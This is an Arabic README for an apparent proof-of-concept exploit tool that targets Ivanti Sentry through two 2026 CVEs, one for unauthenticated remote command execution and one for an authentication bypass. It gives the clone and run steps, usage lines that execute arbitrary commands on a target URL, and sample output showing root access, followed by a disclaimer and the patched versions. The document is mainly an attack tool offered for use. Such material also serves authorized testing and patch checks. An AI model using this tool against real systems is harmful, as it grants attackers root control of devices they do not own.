
CVE-2026-10520
تنفيذ الأوامر عن بُعد بدون مصادقة + تجاوز المصادقة
المؤلف: Ashraf Zaryouh "0xBlackash"
ثغرتان أمنيتان حرجتان تؤثران على Ivanti Sentry (المعروف سابقًا بـ MobileIron Sentry):
تسمح هذه الثغرات للمهاجمين غير المصادق عليهم بالوصول الكامل إلى النظام.
python3 CVE-2026-10520.py --url <TARGET> --cmd <COMMAND>
# الاستخدام الأساسي
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "id"
# وضع الإسهاب
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "whoami" -v
# مع وكيل
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a" --proxy 127.0.0.1:8080
# التحقق من النواة
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a"
git clone https://github.com/0xBlackash/CVE-2026-10520.git
cd CVE-2026-10520
chmod +x CVE-2026-10520.py
عندما يكون الهدف معرضًا للخطر، سترى:
██████╗ ██╗ ██╗██████╗ ██╗ █████╗ ██████╗██╗ ██╗ █████╗ ███████╗██╗ ██╗
██╔═████╗╚██╗██╔╝██╔══██╗██║ ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║ ██║
██║██╔██║ ╚███╔╝ ██████╔╝██║ ███████║██║ █████╔╝ ███████║███████╗███████║
████╔╝██║ ██╔██╗ ██╔══██╗██║ ██╔══██║██║ ██╔═██╗ ██╔══██║╚════██║██╔══██║
╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║ ██║╚██████╗██║ ██╗██║ ██║███████║██║ ██║
╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
CVE-2026-10520 & CVE-2026-10523 PoC Exploit
Ivanti Sentry Pre-Auth RCE + Auth Bypass
Author: Ashraf Zaryouh "0xBlackash"
GitHub: https://github.com/0xBlackash
[+] Target is VULNERABLE!
Command Output:
uid=0(root) gid=0(root) groups=0(root)
هذه الأداة مخصصة للأغراض التعليمية واختبارات الأمان المصرح بها فقط.
الاستخدام غير المصرح به ضد أنظمة لا تملكها غير قانوني.
المؤلف لا يتحمل أي مسؤولية عن سوء الاستخدام.
تم الإصلاح في: 10.5.2 / 10.6.2 / 10.7.1
تم الإنشاء بـ ❤️ بواسطة Ashraf Zaryouh "0xBlackash"
قم بتمييز المستودع بنجمة إذا وجدته مفيدًا! ⭐
| الوسيط | الوصف | مطلوب |
|---|
--url | عنوان الهدف (مثل https://target:8443) | نعم |
--cmd | الأمر المطلوب تنفيذه | نعم |
-v, --verbose | تفعيل الإخراج المفصل | لا |
--proxy | وكيل HTTP (host:port) | لا |